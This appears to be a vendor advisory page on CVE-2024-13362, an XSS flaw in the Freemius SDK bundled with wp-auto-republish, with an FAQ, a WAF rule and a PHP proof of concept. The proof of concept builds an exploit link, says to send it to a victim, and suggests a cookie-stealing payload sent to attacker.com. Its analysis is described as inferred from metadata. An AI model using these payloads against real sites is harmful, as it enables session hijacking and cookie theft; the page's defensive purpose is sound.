What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK version 2.10.1 and earlier. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter due to insufficient input sanitization.

Who is affected by this vulnerability?

WordPress sites using the wp-auto-republish plugin version 1.5.8 or any plugin/theme that includes the Freemius SDK version 2.10.1 or earlier are affected. Administrators should check their installed plugins for these versions.

How does the vulnerability work?

The vulnerability allows attackers to craft malicious links that include a JavaScript payload in the ‘url’ parameter. When a user clicks the link, the Freemius SDK processes the parameter without proper sanitization, executing the attacker’s script in the user’s browser.

What is the CVSS score and what does it mean?

CVE-2024-13362 has a CVSS score of 6.1, classified as Medium severity. This indicates that while exploitation requires user interaction, it does not require authentication, posing a risk to users if they are tricked into clicking a malicious link.

How can I check if my site is vulnerable?

To check for vulnerability, review the versions of the Freemius SDK and the wp-auto-republish plugin in use on your WordPress site. If you are using version 1.5.8 of wp-auto-republish or Freemius SDK version 2.10.1 or earlier, your site is vulnerable.

What are the potential risks of this vulnerability?

If exploited, this vulnerability can lead to session hijacking, unauthorized actions on behalf of users, and redirection to malicious sites. The impact is primarily on the victim’s browser session, but it can have significant implications for site administrators.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Freemius SDK to a patched version if available. Additionally, plugin developers should ensure proper sanitization of the ‘url’ parameter using functions like esc_url_raw() and sanitize_text_field() in their code.

What should I do if I cannot update the SDK?

If updating the SDK is not possible, consider overriding the vulnerable function with a filter or implementing your own sanitization and escaping logic for the ‘url’ parameter to prevent script injection.

Can you explain the proof of concept?

The proof of concept illustrates how an attacker can craft a URL containing a JavaScript payload in the ‘url’ parameter. When a victim clicks this link, the payload executes in their browser, demonstrating the risk of XSS exploitation.

What is reflected XSS and how does it differ from stored XSS?

Reflected XSS occurs when an attacker’s script is reflected off a web server, typically via a URL parameter, and executed immediately. In contrast, stored XSS involves the script being stored on the server and executed when a user accesses the affected page.

What actions should I take if my site has been exploited?

If your site has been exploited, immediately remove any malicious scripts, change passwords for affected accounts, and review logs for unauthorized access. It is also essential to patch the vulnerability to prevent further exploitation.

Where can I find more information about this vulnerability?

For more information on CVE-2024-13362, you can refer to the official CVE database, security advisories from WordPress, and resources provided by security firms specializing in web vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 9, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (wp-auto-republish)

CVE ID CVE-2024-13362

Plugin wp-auto-republish

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.5.8

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):

This vulnerability is a Reflected DOM-Based Cross-Site Scripting (XSS) affecting the Freemius SDK library (version 2.10.1 and earlier) which is bundled with multiple WordPress plugins and themes, including the wp-auto-republish plugin (version 1.5.8). The vulnerability allows unauthenticated attackers to inject arbitrary web scripts through the ‘url’ parameter due to insufficient input sanitization and output escaping. The CVSS score of 6.1 (Medium) with a vector of AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N indicates remote exploitation requires user interaction but needs no authentication, with scope change enabling low impact to confidentiality and integrity.

Atomic Edge analysis infers from the CWE-79 classification that the vulnerable code likely uses JavaScript’s DOM manipulation methods (e.g., innerHTML, document.write, or jQuery.html()) to process the ‘url’ parameter without proper encoding. The description confirms this is a reflected XSS specifically triggered via the ‘url’ parameter. The Freemius SDK, being a third-party library, likely processes URLs for analytics, license checks, or redirect purposes. The absence of a patched version suggests the vulnerability may exist in the core SDK that plugins include, making remediation dependent on updating the SDK.

The attack vector exploits the Freemius SDK’s handling of the ‘url’ parameter. An attacker crafts a malicious link containing a JavaScript payload in the ‘url’ parameter, such as www.target.com/?url=javascript:alert(document.cookie). The SDK’s JavaScript code reads this parameter from the URL query string and injects it into the page DOM without sanitization. When a victim clicks the link, the attacker’s script executes in the victim’s browser session with the origin of the vulnerable site. The attack requires user interaction (clicking) per CVSS, making it a phishing-style vector.

Remediation requires the Freemius SDK to properly sanitize the ‘url’ parameter using URL validation (e.g., parse_url with a whitelist of allowed schemes) and escape output when inserting into the DOM. For WordPress plugins bundling the SDK, updating to a patched version of the library (if made available) or overriding the vulnerable function with a filter would be necessary. Plugin developers should use core WordPress functions like esc_url_raw() and sanitize_text_field() for untrusted URL inputs.

If exploited, this vulnerability allows attackers to inject arbitrary JavaScript into the context of the vulnerable site. This can lead to session hijacking by stealing cookies, performing actions on behalf of the authenticated user (if an admin clicks the link), redirecting users to malicious sites, or defacing the page. The confidentiality impact is low as it primarily affects the victim’s browser session, but combined with social engineering, it can have significant consequences for site administrators.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Detects attempts to exploit Reflected DOM-Based XSS via the 'url' parameter in Freemius SDK
SecRule REQUEST_URI "@rx ?.*url=" 
  "id:20241994,phase:1,deny,status:403,chain,msg:'CVE-2024-13362 Freemius url parameter XSS attempt',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_GET:url "@rx (?:javascript:|<script|onw+s*=)" 
    "t:lowercase,chain"
    SecRule REQUEST_HEADERS:Referer "@rx wordpress" 
      "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

/*
 * Assumptions:
 * Target site uses a plugin/theme that bundles Freemius SDK <= 2.10.1.
 * The vulnerable endpoint is the main site URL where Freemius JavaScript processes the 'url' query parameter.
 * No authentication required; victim must click the crafted link.
 */

$target_url = 'https://example.com';  // CHANGE THIS to the target WordPress site

$payload = urlencode('<script>alert("CVE-2024-13362")</script>');
$exploit_url = $target_url . '/?url=' . $payload;

echo "[+] Atomic Edge CVE-2024-13362 Proof of Conceptn";
echo "[+] Crafted exploit URL:n";
echo $exploit_url . "nn";
echo "[*] Send this link to a victim. Upon clicking, the JavaScript payload will execute.n";
echo "[*] For a more impactful payload, replace the payload with: document.location='http://attacker.com/steal.php?c='+document.cookien";

// Simulate a request to confirm the parameter is reflected (if server-side reflection exists)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "n[*] Server response HTTP code: " . $http_code . "n";
if (strpos($response, 'alert("CVE-2024-13362")') !== false) {
    echo "[+] The payload appears to be reflected in the response. XSS confirmed.n";
} else {
    echo "[-] The payload was not found in the response. XSS may be DOM-based only, check browser console.n";
}

?>

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK version 2.10.1 and earlier. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter due to insufficient input sanitization.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress sites using the wp-auto-republish plugin version 1.5.8 or any plugin/theme that includes the Freemius SDK version 2.10.1 or earlier are affected. Administrators should check their installed plugins for these versions.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to craft malicious links that include a JavaScript payload in the ‘url’ parameter. When a user clicks the link, the Freemius SDK processes the parameter without proper sanitization, executing the attacker’s script in the user’s browser.
What is the CVSS score and what does it mean?
Understanding the severity rating
CVE-2024-13362 has a CVSS score of 6.1, classified as Medium severity. This indicates that while exploitation requires user interaction, it does not require authentication, posing a risk to users if they are tricked into clicking a malicious link.
How can I check if my site is vulnerable?
Steps for vulnerability assessment
To check for vulnerability, review the versions of the Freemius SDK and the wp-auto-republish plugin in use on your WordPress site. If you are using version 1.5.8 of wp-auto-republish or Freemius SDK version 2.10.1 or earlier, your site is vulnerable.
What are the potential risks of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can lead to session hijacking, unauthorized actions on behalf of users, and redirection to malicious sites. The impact is primarily on the victim’s browser session, but it can have significant implications for site administrators.
How can I mitigate this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the Freemius SDK to a patched version if available. Additionally, plugin developers should ensure proper sanitization of the ‘url’ parameter using functions like esc_url_raw() and sanitize_text_field() in their code.
What should I do if I cannot update the SDK?
Alternative mitigation strategies
If updating the SDK is not possible, consider overriding the vulnerable function with a filter or implementing your own sanitization and escaping logic for the ‘url’ parameter to prevent script injection.
Can you explain the proof of concept?
Demonstration of the vulnerability
The proof of concept illustrates how an attacker can craft a URL containing a JavaScript payload in the ‘url’ parameter. When a victim clicks this link, the payload executes in their browser, demonstrating the risk of XSS exploitation.
What is reflected XSS and how does it differ from stored XSS?
Types of Cross-Site Scripting
Reflected XSS occurs when an attacker’s script is reflected off a web server, typically via a URL parameter, and executed immediately. In contrast, stored XSS involves the script being stored on the server and executed when a user accesses the affected page.
What actions should I take if my site has been exploited?
Response to exploitation
If your site has been exploited, immediately remove any malicious scripts, change passwords for affected accounts, and review logs for unauthorized access. It is also essential to patch the vulnerability to prevent further exploitation.
Where can I find more information about this vulnerability?
Additional resources
For more information on CVE-2024-13362, you can refer to the official CVE database, security advisories from WordPress, and resources provided by security firms specializing in web vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations